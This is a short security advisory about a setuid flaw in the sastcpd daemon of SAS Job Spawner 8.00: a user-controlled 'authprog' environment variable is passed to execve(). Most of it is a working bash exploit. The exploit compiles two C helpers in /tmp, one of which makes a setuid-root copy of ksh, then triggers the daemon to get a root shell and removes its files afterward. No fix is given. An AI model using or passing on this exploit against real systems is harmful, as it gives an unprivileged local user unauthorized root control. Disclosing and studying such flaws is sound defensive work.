|
COMMAND sastcpd trusts variables, this leads in local root exploit SYSTEMS AFFECTED SAS Job Spawner for Open Systems version 8.00 PROBLEM The daemon passes a user-defined environment variable, \'authprog\', to execve(). This obviously is a problem if sastcpd is setuid. Exploit ======= #!/bin/bash # sastcpd 8.0 \'authprog\' vulnerability. # rpc <rpc@unholy.net> || <h@ckz.org> # Thanks sharefuzz! cat <<EOT >/tmp/hesh.c int main(void) { setuid(0); setgid(0); execl(\"/bin/ksh\", \"ksh\", (char *)0); } EOT cat <<EOT >/tmp/heh.c int main(void) { setuid(0); setgid(0); system(\"chown 0:0 /tmp/hesh\"); system(\"chmod 4755 /tmp/hesh\"); return 0; } EOT gcc -o /tmp/heh /tmp/heh.c gcc -o /tmp/hesh /tmp/hesh.c export authprog=/tmp/heh /path/to/sas/utilities/bin/sastcpd sleep 1 rm /tmp/he*.c rm /tmp/heh /tmp/hesh SOLUTION None yet